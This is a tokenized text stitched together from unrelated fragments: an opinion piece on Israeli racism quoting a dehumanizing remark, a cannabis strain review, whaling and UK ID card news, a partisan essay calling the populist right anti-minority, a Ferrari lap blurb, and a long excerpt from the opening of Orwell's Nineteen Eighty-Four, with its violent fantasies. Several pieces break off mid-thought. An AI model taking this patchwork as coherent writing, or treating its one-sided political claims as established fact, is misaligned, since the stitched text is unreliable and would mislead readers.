According to a BBC report on the discovery , " One , printed for a platoon of Israeli snipers , depicts an armed Palestinian pregnant women caught in the crosshairs of a rifle , with the disturbing caption in English : ' 1 shot 2 kills . ' "
As shocking as these revelations were , they should come as no surprise .
For if the Israeli political class harbours these overtly racist feelings , they also model them for their soldiers .
The Oct. 18 , 1973 entry of the British House of Commons in Hansard records the reporting of MP R.J. Maxwell - Hislop to the House on his experience as part of a parliamentary delegation to Israel .
He had been a lunch guest of the foreign affairs committee of the Knesset .
" After lunch , the chairman of the committee spoke with great intemperance and at great length about the Arabs .
I was constrained to say , ' Dr. Hacohen , I am profoundly shocked that you should preach of other human beings in terms similar to those in which Julius Streicher spoke of the Jews .
Have you learned nothing ? '
I shall remember his reply to my dying day .
He smote the table with both hands and said ' But they are not human beings , they are not people .
They are Arabs . ' "
Strain Name : Purple Kush
Grade : A-
Type : Indica
Looks : Purpppppple !
Hairy , Lots of crystals
Smell : Dank .
Like Kush .
Taste : Very good , as it smells .
Effects : Sleeeepy .
Lots of body , this is for night .
Potency : Heavy , lots of THC
Reviewed by : Kenji
Australia has expressed its alarm as support grows internationally for a pact to legalise whaling .
New Zealand has backed the compromise pact , which would lift the current ban on commercial whaling while reducing the number of whales killed by Japan under the guise of " research " .
NZ had been one of Australia 's staunchest allies in the fight against Antarctic whaling .
But now the country 's whaling commissioner , Sir Geoffrey Palmer , says he 'll support the compromise proposal at the next meeting of the International Whaling Commission ( IWC ) in June , the ABC reports .
Currently , commercial whaling is banned but countries can hunt whales in the name of science .
Up to 1900 are killed each year .
[ digg- reddit - me ] Thesis # 1 :
There is a glaring discrepancy between :
the populist right ’s rhetorical opposition to all domestic government action on the grounds that it is incompetent , ineffective , and a threat to liberty ; and
the populist right ’s support for apparently unlimited government power on national security and law enforcement matters on the grounds that it is highly competent , effective , and the defender of liberty .
( Initial post on the subject . )
— ——
These contradictory views of the state have been a part of the populist right since its modern inception — you can see it in Barry Goldwater , in Ronald Reagan , in George W. Bush .
In fact , despite the rhetorical agitprop that has accompanied every surge in the populist right , it is impossible to understand the inflows of energy into and out of it , or to understand how it has acted when entrusted with power , while taking seriously the anti-government views it constantly invokes .
Thesis # 2 : Populist right wing movements have not been historically anti-government despite their rhetoric ; they have been anti-minority .
They have supported the expansion of government power to check the threats from minorities and opposed the expansion of government power to benefit any minorities .
— ——
Rather than opposing “ government ” as a whole , the populist right has gained its energy and support from opposing liberal government and especially from opposing liberal government support for the rights of individuals who are members of minority groups .
They have also supported programs in which the government is seen to strongly take on the interests of individuals who are members of minority groups .
Given the rhetoric in recent days from Virgina Governor Bob McDonnell and the geographical concentration of the Republican Party and populist right in the Southern states that rebelled in the Civil War , it ’s worth pointing out that that conflict was described by the Confederacy at the time , and by McDonnell today , in anti-government terms — as about “ states ’ rights ” rather than slavery .
The populist right was decimated by Franklin Delano Roosevelt ’s presidency but finally began to become energized in opposition to the Civil Rights Movement as the South quickly flipped to the Republican Party ; it further was energized by the feminist revolution and the rise of the counterculture in the late 1960s .
Then Nixon became president and the populist right quieted down as he expanded government in every direction and the Supreme Court legalized abortion .
After 2 terms of Republican rule , a liberal became president , was accused of being weak and not loving America enough , and the pro-life movement began to gather strength ; and once again , the party of limited government and cheery jingoism made a comeback with evangelical fervor .
Ronald Reagan also expanded government , but reduced it ’s role in helping minorities and the middle class , reduced regulations on corporations , and lowered the tax burden on everyone a little and the rich a lot .
Once again , the populist right was quiet .
The first Bush was never comfortable with the populist right and a splinter group broke away from his electoral coalition causing him to lose the 1992 election to a young , fresh - faced liberal .
Once again , the populist right was called to arms with the militia and white supremacist movements thriving ( encouraged by Ron Paul who saw them as a necessary evil ) .
With welfare reform , budget surpluses , tax cuts for the middle class , and a humming economy , Clinton managed to quiet the populist right ’s rage at government .
But the right wing elites still despised the man , convinced he was somehow not a legitimate president .
They fostered various conspiracy theories about his murder of Vince Foster , about drug running in Arizona , and about hundreds of women .
Later , a second Bush was elected and once again trimmed regulations protecting consumers but expanded government involvement in security , in education , in helping the elderly further — but the populist right rallied to him as he invoked mythical Democrats endorsing therapy for terrorists and expanded the government ’s powers to go after terrorists .
The populist right finally broke with Bush when he tried to push through immigration reform in 2006 .
Meanwhile , a massive investment bubble was growing under the hands - off policy of Bush and as it popped in the late summer and early fall of 2008 , with the election looming , he oversaw the first steps of the cleanup of the mess — the infamous bailouts .
The populist right ( along with the populist left , the populist center , and most everyone ) was angered and invigorated by this bailout .
The populist right was further motivated by a personal animus towards Obama , as they were told that he was n’t American in the way the rest of us were , that he was foreign , that he would “ stand with the Muslims , ” that he was sympathetic to terrorists .
After a brief lull after their defeat in the election , the populist right was once again galvanized by the health care debate and Obama ’s treatment of suspected terrorist detainees .
After some early talk of the health care bill as a secret conspiracy to give reparations to black Americans for slavery ( it was n’t ) and controversy over covering illegal immigrants ( it does n’t ) , the attacks on the bill from the populist right centered on the idea that it was a government takeover of 1/6th of the American economy ( it is n’t ) .
Meanwhile , regarding the treatment of detainees , Obama has largely continued Bush ’s policies with some attempts to …
Yet despite this , the populist right has rallied to the idea that Obama is engaged in various treasonous activities and of endangering American lives .
What you see is a Republican Party that exists to expand and use government to benefit large corporations , the military - industrial complex , the rich , and the elderly at the expense of everyone else .
At the same time , the populist right loudly objects to the government being used to benefit anyone but them .
“ Them , ” meaning the elderly , the rich , the white Southerners .
Which is why Republicans and the populist right are in favor of Medicare — and against Obamacare .
Which is why they do n’t mind when people that they would never be mistaken for are held without trial , tortured , or killed — and it ’s why they are so outraged when people they might be mistaken for are .
Which is why they rally when a liberal is in charge and are calm when a Republican is .
The populist right has been inherently about opposition — and about cultural alienation .
It is about ressentiment and anger at how the world is changing .
It has indisputably been invigorated by racial tensions — from opposition to the Civil Rights Movement to absurd claims of “ welfare queens driving Cadillacs ” to the militia movement of the 1990s .
It is about feeling shafted by the powers that be .
It is a very white movement , with resentment being driven against government rights and benefits being given to different groups that are stereotypically associated with minority groups : Latinos ( illegal immigrants ) , blacks ( criminals and welfare queens ) , and Muslims / Arabs ( terrorists ) .
Conclusion : Resentment of minority groups ( broadly construed ) makes sense of the populist right ’s contradictory views on government in ways that opposition to the government cannot and explains its historical rises and falls .
N.B. I am not claiming all right wingers are racist .
Or Republicans or conservatives .
I am merely pointing out the fact that the populist right has historically been empowered during times of racial tensions and that it ’s positions are coherent and do make sense if understood in these terms while they do not if one interprets these rises and falls from an ideology opposed to big government .
[ Image not subject to copyright . ]
Like Loading ...
Go for a ride Germany 's Nurburgring track in a Ferrari 599XX as it sets a record for the fastest lap in a production - derived sports car .
The Ferrari did it in 6 minutes , 58.16 seconds on the 12.9 - mile Nordschleife circuit .
Seen any other recent videos on the Web we should know about ?
Drop us a note .
The current generation of UK ID card is , apparently , the wrong kind of ID card , and is likely to be upgraded to incorporate new features by 2012 .
These are likely to include chip and pin for online transactions and ID verification , both of which have been spoken of in the past by ID minister Meg Hillier .
The upgrade , however , will mean that all of the ID cards issued prior to 2012 will have to be replaced .
Hillier has recently been calling for businesses to come up with applications and ideas for using ID cards , and talking about adding new functionality as the technology evolves .
A lack of online functionality has however been an obvious weakness of the ID scheme from the outset , so this is more a case of the Home Office belatedly recognising this than of technological evolution .
But the mooted 2012 upgrade presents the Home Office with some problems .
ID cards are valid for ten years , and were originally costed - highly optimistically - to have a ten year lifespan .
The cost of replacing the 10,000 that the Home Office says will shortly be in circulation wo n't be that great , but obviously the more popular the Home Office makes ID cards , the more expensive it 's going to be to recall them .
And if some of Hillier 's wackier ideas ( she compares them to the iPhone , and suggests the chip could be integrated into handsets ) get implemented , the Identity & Passport Service could find itself issuing new iD ( thanks , Sir Bonar ) every couple of years .
Making ID cards as popular as iPhones and having the fan base clamouring for an upgrade every two years is unlikely to be the plan , though .
According to Home Secretary Alan Johnson , it 's planned that 17 million ID cards will be in circulation by 2017 , and previous IPS roadmaps have spoken of enrolling people in high volumes from 2011 / 2012 .
So provided the upgrade goes ahead , it 's quite possible that IPS wo n't try to ship too many for the next two years , and then go high volume with New Improved iD™ card from 2012 .
It 's also possible that this has been the plan for some time , and that the only point of shipping version one was to get a few of them in people 's hands prior to the general election . ®
I just love this chart — it essentially argues the case that US markets have been over valued since around 1990 :
>
courtesy of the Chart Store
PART I I
It was a bright cold day in April , and the clocks were striking thirteen .
Winston Smith , his chin nuzzled into his breast in an effort to escape the vile wind , slipped quickly through the glass doors of Victory Mansions , though not quickly enough to prevent a swirl of gritty dust from entering along with him .
The hallway smelt of boiled cabbage and old rag mats .
At one end of it a coloured poster , too large for indoor display , had been tacked to the wall .
It depicted simply an enormous face , more than a metre wide : the face of a man of about forty - five , with a heavy black moustache and ruggedly handsome features .
Winston made for the stairs .
It was no use trying the lift .
Even at the best of times it was seldom working , and at present the electric current was cut off during daylight hours .
It was part of the economy drive in preparation for Hate Week .
The flat was seven flights up , and Winston , who was thirty - nine and had a varicose ulcer above his right ankle , went slowly , resting several times on the way .
On each landing , opposite the lift - shaft , the poster with the enormous face gazed from the wall .
It was one of those pictures which are so contrived that the eyes follow you about when you move .
BIG BROTHER IS WATCHING YOU , the caption beneath it ran .
Inside the flat a fruity voice was reading out a list of figures which had something to do with the production of pig-iron .
The voice came from an oblong metal plaque like a dulled mirror which formed part of the surface of the right - hand wall .
Winston turned a switch and the voice sank somewhat , though the words were still distinguishable .
The instrument ( the telescreen , it was called ) could be dimmed , but there was no way of shutting it off completely .
He moved over to the window : a smallish , frail figure , the meagreness of his body merely emphasized by the blue overalls which were the uniform of the party .
His hair was very fair , his face naturally sanguine , his skin roughened by coarse soap and blunt razor blades and the cold of the winter that had just ended .
Outside , even through the shut window - pane , the world looked cold .
Down in the street little eddies of wind were whirling dust and torn paper into spirals , and though the sun was shining and the sky a harsh blue , there seemed to be no colour in anything , except the posters that were plastered everywhere .
The blackmoustachio'd face gazed down from every commanding corner .
There was one on the house - front immediately opposite .
BIG BROTHER IS WATCHING YOU , the caption said , while the dark eyes looked deep into Winston 's own .
Down at street level another poster , torn at one corner , flapped fitfully in the wind , alternately covering and uncovering the single word INGSOC .
In the far distance a helicopter skimmed down between the roofs , hovered for an instant like a bluebottle , and darted away again with a curving flight .
It was the police patrol , snooping into people 's windows .
The patrols did not matter , however .
Only the Thought Police mattered .
Behind Winston 's back the voice from the telescreen was still babbling away about pig-iron and the overfulfilment of the Ninth Three - Year Plan .
The telescreen received and transmitted simultaneously .
Any sound that Winston made , above the level of a very low whisper , would be picked up by it , moreover , so long as he remained within the field of vision which the metal plaque commanded , he could be seen as well as heard .
There was of course no way of knowing whether you were being watched at any given moment .
How often , or on what system , the Thought Police plugged in on any individual wire was guesswork .
It was even conceivable that they watched everybody all the time .
But at any rate they could plug in your wire whenever they wanted to .
You had to live — did live , from habit that became instinct — in the assumption that every sound you made was overheard , and , except in darkness , every movement scrutinized .
Winston kept his back turned to the telescreen .
It was safer , though , as he well knew , even a back can be revealing .
A kilometre away the Ministry of Truth , his place of work , towered vast and white above the grimy landscape .
This , he thought with a sort of vague distaste — this was London , chief city of Airstrip One , itself the third most populous of the provinces of Oceania .
He tried to squeeze out some childhood memory that should tell him whether London had always been quite like this .
Were there always these vistas of rotting nineteenth - century houses , their sides shored up with baulks of timber , their windows patched with cardboard and their roofs with corrugated iron , their crazy garden walls sagging in all directions ?
And the bombed sites where the plaster dust swirled in the air and the willow - herb straggled over the heaps of rubble ; and the places where the bombs had cleared a larger patch and there had sprung up sordid colonies of wooden dwellings like chicken - houses ?
But it was no use , he could not remember : nothing remained of his childhood except a series of bright - lit tableaux occurring against no background and mostly unintelligible .
The Ministry of Truth — Minitrue , in Newspeak ( 1 ) — was startlingly different from any other object in sight .
It was an enormous pyramidal structure of glittering white concrete , soaring up , terrace after terrace , 300 metres into the air .
From where Winston stood it was just possible to read , picked out on its white face in elegant lettering , the three slogans of the Party :
WAR IS PEACE
FREEDOM IS SLAVERY
IGNORANCE IS STRENGTH
The Ministry of Truth contained , it was said , three thousand rooms above ground level , and corresponding ramifications below .
Scattered about London there were just three other buildings of similar appearance and size .
So completely did they dwarf the surrounding architecture that from the roof of Victory Mansions you could see all four of them simultaneously .
They were the homes of the four Ministries between which the entire apparatus of government was divided .
The Ministry of Truth , which concerned itself with news , entertainment , education , and the fine arts .
The Ministry of Peace , which concerned itself with war .
The Ministry of Love , which maintained law and order .
And the Ministry of Plenty , which was responsible for economic affairs .
Their names , in Newspeak : Minitrue , Minipax , Miniluv , and Miniplenty .
The Ministry of Love was the really frightening one .
There were no windows in it at all .
Winston had never been inside the Ministry of Love , nor within half a kilometre of it .
It was a place impossible to enter except on official business , and then only by penetrating through a maze of barbed - wire entanglements , steel doors , and hidden machine - gun nests .
Even the streets leading up to its outer barriers were roamed by gorilla - faced guards in black uniforms , armed with jointed truncheons .
Winston turned round abruptly .
He had set his features into the expression of quiet optimism which it was advisable to wear when facing the telescreen .
He crossed the room into the tiny kitchen .
By leaving the Ministry at this time of day he had sacrificed his lunch in the canteen , and he was aware that there was no food in the kitchen except a hunk of dark - coloured bread which had got to be saved for tomorrow 's breakfast .
He took down from the shelf a bottle of colourless liquid with a plain white label marked VICTORY GIN .
It gave off a sickly , oily smell , as of Chinese rice - spirit .
Winston poured out nearly a teacupful , nerved himself for a shock , and gulped it down like a dose of medicine .
Instantly his face turned scarlet and the water ran out of his eyes .
The stuff was like nitric acid , and moreover , in swallowing it one had the sensation of being hit on the back of the head with a rubber club .
The next moment , however , the burning in his belly died down and the world began to look more cheerful .
He took a cigarette from a crumpled packet marked VICTORY CIGARETTES and incautiously held it upright , whereupon the tobacco fell out on to the floor .
With the next he was more successful .
He went back to the living - room and sat down at a small table that stood to the left of the telescreen .
From the table drawer he took out a penholder , a bottle of ink , and a thick , quarto - sized blank book with a red back and a marbled cover .
For some reason the telescreen in the living - room was in an unusual position .
Instead of being placed , as was normal , in the end wall , where it could command the whole room , it was in the longer wall , opposite the window .
To one side of it there was a shallow alcove in which Winston was now sitting , and which , when the flats were built , had probably been intended to hold bookshelves .
By sitting in the alcove , and keeping well back , Winston was able to remain outside the range of the telescreen , so far as sight went .
He could be heard , of course , but so long as he stayed in his present position he could not be seen .
It was partly the unusual geography of the room that had suggested to him the thing that he was now about to do .
But it had also been suggested by the book that he had just taken out of the drawer .
It was a peculiarly beautiful book .
Its smooth creamy paper , a little yellowed by age , was of a kind that had not been manufactured for at least forty years past .
He could guess , however , that the book was much older than that .
He had seen it lying in the window of a frowsy little junk - shop in a slummy quarter of the town ( just what quarter he did not now remember ) and had been stricken immediately by an overwhelming desire to possess it .
Party members were supposed not to go into ordinary shops ( ‘ dealing on the free market ’ , it was called ) , but the rule was not strictly kept , because there were various things , such as shoelaces and razor blades , which it was impossible to get hold of in any other way .
He had given a quick glance up and down the street and then had slipped inside and bought the book for two dollars fifty .
At the time he was not conscious of wanting it for any particular purpose .
He had carried it guiltily home in his briefcase .
Even with nothing written in it , it was a compromising possession .
The thing that he was about to do was to open a diary .
This was not illegal ( nothing was illegal , since there were no longer any laws ) , but if detected it was reasonably certain that it would be punished by death , or at least by twenty - five years in a forced - labour camp .
Winston fitted a nib into the penholder and sucked it to get the grease off .
The pen was an archaic instrument , seldom used even for signatures , and he had procured one , furtively and with some difficulty , simply because of a feeling that the beautiful creamy paper deserved to be written on with a real nib instead of being scratched with an ink-pencil .
Actually he was not used to writing by hand .
Apart from very short notes , it was usual to dictate everything into the speak - write which was of course impossible for his present purpose .
He dipped the pen into the ink and then faltered for just a second .
A tremor had gone through his bowels .
To mark the paper was the decisive act .
In small clumsy letters he wrote :
April 4th , 1984 .
He sat back .
A sense of complete helplessness had descended upon him .
To begin with , he did not know with any certainty that this was 1984 .
It must be round about that date , since he was fairly sure that his age was thirty - nine , and he believed that he had been born in 1944 or 1945 ; but it was never possible nowadays to pin down any date within a year or two .
For whom , it suddenly occurred to him to wonder , was he writing this diary ?
For the future , for the unborn .
His mind hovered for a moment round the doubtful date on the page , and then fetched up with a bump against the Newspeak word doublethink .
For the first time the magnitude of what he had undertaken came home to him .
How could you communicate with the future ?
It was of its nature impossible .
Either the future would resemble the present , in which case it would not listen to him : or it would be different from it , and his predicament would be meaningless .
For some time he sat gazing stupidly at the paper .
The telescreen had changed over to strident military music .
It was curious that he seemed not merely to have lost the power of expressing himself , but even to have forgotten what it was that he had originally intended to say .
For weeks past he had been making ready for this moment , and it had never crossed his mind that anything would be needed except courage .
The actual writing would be easy .
All he had to do was to transfer to paper the interminable restless monologue that had been running inside his head , literally for years .
At this moment , however , even the monologue had dried up .
Moreover his varicose ulcer had begun itching unbearably .
He dared not scratch it , because if he did so it always became inflamed .
The seconds were ticking by .
He was conscious of nothing except the blankness of the page in front of him , the itching of the skin above his ankle , the blaring of the music , and a slight booziness caused by the gin .
Suddenly he began writing in sheer panic , only imperfectly aware of what he was setting down .
His small but childish handwriting straggled up and down the page , shedding first its capital letters and finally even its full stops :
April 4th , 1984 .
Last night to the flicks .
All war films .
One very good one of a ship full of refugees being bombed somewhere in the Mediterranean .
Audience much amused by shots of a great huge fat man trying to swim away with a helicopter after him , first you saw him wallowing along in the water like a porpoise , then you saw him through the helicopters gunsights , then he was full of holes and the sea round him turned pink and he sank as suddenly as though the holes had let in the water , audience shouting with laughter when he sank .
then you saw a lifeboat full of children with a helicopter hovering over it .
there was a middle - aged woman might have been a jewess sitting up in the bow with a little boy about three years old in her arms .
little boy screaming with fright and hiding his head between her breasts as if he was trying to burrow right into her and the woman putting her arms round him and comforting him although she was blue with fright herself , all the time covering him up as much as possible as if she thought her arms could keep the bullets off him .
then the helicopter planted a 20 kilo bomb in among them terrific flash and the boat went all to matchwood .
then there was a wonderful shot of a child 's arm going up up up right up into the air a helicopter with a camera in its nose must have followed it up and there was a lot of applause from the party seats but a woman down in the prole part of the house suddenly started kicking up a fuss and shouting they didnt oughter of showed it not in front of kids they didnt it aint right not in front of kids it aint until the police turned her turned her out i dont suppose anything happened to her nobody cares what the proles say typical prole reaction they never —
Winston stopped writing , partly because he was suffering from cramp .
He did not know what had made him pour out this stream of rubbish .
But the curious thing was that while he was doing so a totally different memory had clarified itself in his mind , to the point where he almost felt equal to writing it down .
It was , he now realized , because of this other incident that he had suddenly decided to come home and begin the diary today .
It had happened that morning at the Ministry , if anything so nebulous could be said to happen .
It was nearly eleven hundred , and in the Records Department , where Winston worked , they were dragging the chairs out of the cubicles and grouping them in the centre of the hall opposite the big telescreen , in preparation for the Two Minutes Hate .
Winston was just taking his place in one of the middle rows when two people whom he knew by sight , but had never spoken to , came unexpectedly into the room .
One of them was a girl whom he often passed in the corridors .
He did not know her name , but he knew that she worked in the Fiction Department .
Presumably — since he had sometimes seen her with oily hands and carrying a spanner — she had some mechanical job on one of the novel - writing machines .
She was a bold - looking girl , of about twenty - seven , with thick hair , a freckled face , and swift , athletic movements .
A narrow scarlet sash , emblem of the Junior Anti-Sex League , was wound several times round the waist of her overalls , just tightly enough to bring out the shapeliness of her hips .
Winston had disliked her from the very first moment of seeing her .
He knew the reason .
It was because of the atmosphere of hockey - fields and cold baths and community hikes and general clean - mindedness which she managed to carry about with her .
He disliked nearly all women , and especially the young and pretty ones .
It was always the women , and above all the young ones , who were the most bigoted adherents of the Party , the swallowers of slogans , the amateur spies and nosers - out of unorthodoxy .
But this particular girl gave him the impression of being more dangerous than most .
Once when they passed in the corridor she gave him a quick sidelong glance which seemed to pierce right into him and for a moment had filled him with black terror .
The idea had even crossed his mind that she might be an agent of the Thought Police .
That , it was true , was very unlikely .
Still , he continued to feel a peculiar uneasiness , which had fear mixed up in it as well as hostility , whenever she was anywhere near him .
The other person was a man named O'Brien , a member of the Inner Party and holder of some post so important and remote that Winston had only a dim idea of its nature .
A momentary hush passed over the group of people round the chairs as they saw the black overalls of an Inner Party member approaching .
O'Brien was a large , burly man with a thick neck and a coarse , humorous , brutal face .
In spite of his formidable appearance he had a certain charm of manner .
He had a trick of resettling his spectacles on his nose which was curiously disarming — in some indefinable way , curiously civilized .
It was a gesture which , if anyone had still thought in such terms , might have recalled an eighteenth - century nobleman offering his snuffbox .
Winston had seen O'Brien perhaps a dozen times in almost as many years .
He felt deeply drawn to him , and not solely because he was intrigued by the contrast between O'Brien 's urbane manner and his prize - fighter 's physique .
Much more it was because of a secretly held belief — or perhaps not even a belief , merely a hope — that O'Brien 's political orthodoxy was not perfect .
Something in his face suggested it irresistibly .
And again , perhaps it was not even unorthodoxy that was written in his face , but simply intelligence .
But at any rate he had the appearance of being a person that you could talk to if somehow you could cheat the telescreen and get him alone .
Winston had never made the smallest effort to verify this guess : indeed , there was no way of doing so .
At this moment O'Brien glanced at his wrist - watch , saw that it was nearly eleven hundred , and evidently decided to stay in the Records Department until the Two Minutes Hate was over .
He took a chair in the same row as Winston , a couple of places away .
A small , sandy - haired woman who worked in the next cubicle to Winston was between them .
The girl with dark hair was sitting immediately behind .
The next moment a hideous , grinding speech , as of some monstrous machine running without oil , burst from the big telescreen at the end of the room .
It was a noise that set one 's teeth on edge and bristled the hair at the back of one 's neck .
The Hate had started .
As usual , the face of Emmanuel Goldstein , the Enemy of the People , had flashed on to the screen .
There were hisses here and there among the audience .
The little sandy - haired woman gave a squeak of mingled fear and disgust .
Goldstein was the renegade and backslider who once , long ago ( how long ago , nobody quite remembered ) , had been one of the leading figures of the Party , almost on a level with Big Brother himself , and then had engaged in counter - revolutionary activities , had been condemned to death , and had mysteriously escaped and disappeared .
The programmes of the Two Minutes Hate varied from day to day , but there was none in which Goldstein was not the principal figure .
He was the primal traitor , the earliest defiler of the Party 's purity .
All subsequent crimes against the Party , all treacheries , acts of sabotage , heresies , deviations , sprang directly out of his teaching .
Somewhere or other he was still alive and hatching his conspiracies : perhaps somewhere beyond the sea , under the protection of his foreign paymasters , perhaps even — so it was occasionally rumoured — in some hiding - place in Oceania itself .
Winston 's diaphragm was constricted .
He could never see the face of Goldstein without a painful mixture of emotions .
It was a lean Jewish face , with a great fuzzy aureole of white hair and a small goatee beard — a clever face , and yet somehow inherently despicable , with a kind of senile silliness in the long thin nose , near the end of which a pair of spectacles was perched .
It resembled the face of a sheep , and the voice , too , had a sheep - like quality .
Goldstein was delivering his usual venomous attack upon the doctrines of the Party — an attack so exaggerated and perverse that a child should have been able to see through it , and yet just plausible enough to fill one with an alarmed feeling that other people , less level - headed than oneself , might be taken in by it .
He was abusing Big Brother , he was denouncing the dictatorship of the Party , he was demanding the immediate conclusion of peace with Eurasia , he was advocating freedom of speech , freedom of the Press , freedom of assembly , freedom of thought , he was crying hysterically that the revolution had been betrayed — and all this in rapid polysyllabic speech which was a sort of parody of the habitual style of the orators of the Party , and even contained Newspeak words : more Newspeak words , indeed , than any Party member would normally use in real life .
And all the while , lest one should be in any doubt as to the reality which Goldstein 's specious claptrap covered , behind his head on the telescreen there marched the endless columns of the Eurasian army — row after row of solid - looking men with expressionless Asiatic faces , who swam up to the surface of the screen and vanished , to be replaced by others exactly similar .
The dull rhythmic tramp of the soldiers ” boots formed the background to Goldstein 's bleating voice .
Before the Hate had proceeded for thirty seconds , uncontrollable exclamations of rage were breaking out from half the people in the room .
The self - satisfied sheep - like face on the screen , and the terrifying power of the Eurasian army behind it , were too much to be borne : besides , the sight or even the thought of Goldstein produced fear and anger automatically .
He was an object of hatred more constant than either Eurasia or Eastasia , since when Oceania was at war with one of these Powers it was generally at peace with the other .
But what was strange was that although Goldstein was hated and despised by everybody , although every day and a thousand times a day , on platforms , on the telescreen , in newspapers , in books , his theories were refuted , smashed , ridiculed , held up to the general gaze for the pitiful rubbish that they were — in spite of all this , his influence never seemed to grow less .
Always there were fresh dupes waiting to be seduced by him .
A day never passed when spies and saboteurs acting under his directions were not unmasked by the Thought Police .
He was the commander of a vast shadowy army , an underground network of conspirators dedicated to the overthrow of the State .
The Brotherhood , its name was supposed to be .
There were also whispered stories of a terrible book , a compendium of all the heresies , of which Goldstein was the author and which circulated clandestinely here and there .
It was a book without a title .
People referred to it , if at all , simply as the book .
But one knew of such things only through vague rumours .
Neither the Brotherhood nor the book was a subject that any ordinary Party member would mention if there was a way of avoiding it .
In its second minute the Hate rose to a frenzy .
People were leaping up and down in their places and shouting at the tops of their voices in an effort to drown the maddening bleating voice that came from the screen .
The little sandy - haired woman had turned bright pink , and her mouth was opening and shutting like that of a landed fish .
Even O'Brien 's heavy face was flushed .
He was sitting very straight in his chair , his powerful chest swelling and quivering as though he were standing up to the assault of a wave .
The dark - haired girl behind Winston had begun crying out ‘ Swine !
Swine !
Swine !’ and suddenly she picked up a heavy Newspeak dictionary and flung it at the screen .
It struck Goldstein 's nose and bounced off ; the voice continued inexorably .
In a lucid moment Winston found that he was shouting with the others and kicking his heel violently against the rung of his chair .
The horrible thing about the Two Minutes Hate was not that one was obliged to act a part , but , on the contrary , that it was impossible to avoid joining in .
Within thirty seconds any pretence was always unnecessary .
A hideous ecstasy of fear and vindictiveness , a desire to kill , to torture , to smash faces in with a sledge - hammer , seemed to flow through the whole group of people like an electric current , turning one even against one 's will into a grimacing , screaming lunatic .
And yet the rage that one felt was an abstract , undirected emotion which could be switched from one object to another like the flame of a blowlamp .
Thus , at one moment Winston 's hatred was not turned against Goldstein at all , but , on the contrary , against Big Brother , the Party , and the Thought Police ; and at such moments his heart went out to the lonely , derided heretic on the screen , sole guardian of truth and sanity in a world of lies .
And yet the very next instant he was at one with the people about him , and all that was said of Goldstein seemed to him to be true .
At those moments his secret loathing of Big Brother changed into adoration , and Big Brother seemed to tower up , an invincible , fearless protector , standing like a rock against the hordes of Asia , and Goldstein , in spite of his isolation , his helplessness , and the doubt that hung about his very existence , seemed like some sinister enchanter , capable by the mere power of his voice of wrecking the structure of civilization .
It was even possible , at moments , to switch one 's hatred this way or that by a voluntary act .
Suddenly , by the sort of violent effort with which one wrenches one 's head away from the pillow in a nightmare , Winston succeeded in transferring his hatred from the face on the screen to the dark - haired girl behind him .
Vivid , beautiful hallucinations flashed through his mind .
He would flog her to death with a rubber truncheon .
He would tie her naked to a stake and shoot her full of arrows like Saint Sebastian .
He would ravish her and cut her throat at the moment of climax .
Better than before , moreover , he realized why it was that he hated her .
He hated her because she was young and pretty and sexless , because he wanted to go to bed with her and would never do so , because round her sweet supple waist , which seemed to ask you to encircle it with your arm , there was only the odious scarlet sash , aggressive symbol of chastity .
The Hate rose to its climax .
The voice of Goldstein had become an actual sheep 's bleat , and for an instant the face changed into that of a sheep .
Then the sheep - face melted into the figure of a Eurasian soldier who seemed to be advancing , huge and terrible , his sub - machine gun roaring , and seeming to spring out of the surface of the screen , so that some of the people in the front row actually flinched backwards in their seats .
But in the same moment , drawing a deep sigh of relief from everybody , the hostile figure melted into the face of Big Brother , black - haired , black - moustachio'd , full of power and mysterious calm , and so vast that it almost filled up the screen .
Nobody heard what Big Brother was saying .
It was merely a few words of encouragement , the sort of words that are uttered in the din of battle , not distinguishable individually but restoring confidence by the fact of being spoken .
Then the face of Big Brother faded away again , and instead the three slogans of the Party stood out in bold capitals :
WAR IS PEACE
FREEDOM IS SLAVERY
IGNORANCE IS STRENGTH
But the face of Big Brother seemed to persist for several seconds on the screen , as though the impact that it had made on everyone 's eyeballs was too vivid to wear off immediately .
The little sandy - haired woman had flung herself forward over the back of the chair in front of her .
With a tremulous murmur that sounded like ‘ My Saviour ! ’ she extended her arms towards the screen .
Then she buried her face in her hands .
It was apparent that she was uttering a prayer .
At this moment the entire group of people broke into a deep , slow , rhythmical chant of ‘ B - B !... B - B!...’ — over and over again , very slowly , with a long pause between the first ‘ B ’ and the second - a heavy , murmurous sound , somehow curiously savage , in the background of which one seemed to hear the stamp of naked feet and the throbbing of tom - toms .
For perhaps as much as thirty seconds they kept it up .
It was a refrain that was often heard in moments of overwhelming emotion .
Partly it was a sort of hymn to the wisdom and majesty of Big Brother , but still more it was an act of self - hypnosis , a deliberate drowning of consciousness by means of rhythmic noise .
Winston 's entrails seemed to grow cold .
In the Two Minutes Hate he could not help sharing in the general delirium , but this sub - human chanting of ‘ B - B !... B - B! ’ always filled him with horror .
Of course he chanted with the rest : it was impossible to do otherwise .
To dissemble your feelings , to control your face , to do what everyone else was doing , was an instinctive reaction .
But there was a space of a couple of seconds during which the expression of his eyes might conceivably have betrayed him .
And it was exactly at this moment that the significant thing happened — if , indeed , it did happen .
Momentarily he caught O'Brien 's eye .
O'Brien had stood up .
He had taken off his spectacles and was in the act of resettling them on his nose with his characteristic gesture .
But there was a fraction of a second when their eyes met , and for as long as it took to happen Winston knew — yes , he knew ! — that O'Brien was thinking the same thing as himself .
An unmistakable message had passed .
It was as though their two minds had opened and the thoughts were flowing from one into the other through their eyes .
‘ I am with you , ’ O'Brien seemed to be saying to him .
‘ I know precisely what you are feeling .
I know all about your contempt , your hatred , your disgust .
But do n't worry , I am on your side ! ’
And then the flash of intelligence was gone , and O'Brien 's face was as inscrutable as everybody else's .
That was all , and he was already uncertain whether it had happened .
Such incidents never had any sequel .
All that they did was to keep alive in him the belief , or hope , that others besides himself were the enemies of the Party .
Perhaps the rumours of vast underground conspiracies were true after all — perhaps the Brotherhood really existed !
It was impossible , in spite of the endless arrests and confessions and executions , to be sure that the Brotherhood was not simply a myth .
Some days he believed in it , some days not .
There was no evidence , only fleeting glimpses that might mean anything or nothing : snatches of overheard conversation , faint scribbles on lavatory walls — once , even , when two strangers met , a small movement of the hand which had looked as though it might be a signal of recognition .
It was all guesswork : very likely he had imagined everything .
He had gone back to his cubicle without looking at O'Brien again .
The idea of following up their momentary contact hardly crossed his mind .
It would have been inconceivably dangerous even if he had known how to set about doing it .
For a second , two seconds , they had exchanged an equivocal glance , and that was the end of the story .
But even that was a memorable event , in the locked loneliness in which one had to live .
Winston roused himself and sat up straighter .
He let out a belch .
The gin was rising from his stomach .
His eyes re-focused on the page .
He discovered that while he sat helplessly musing he had also been writing , as though by automatic action .
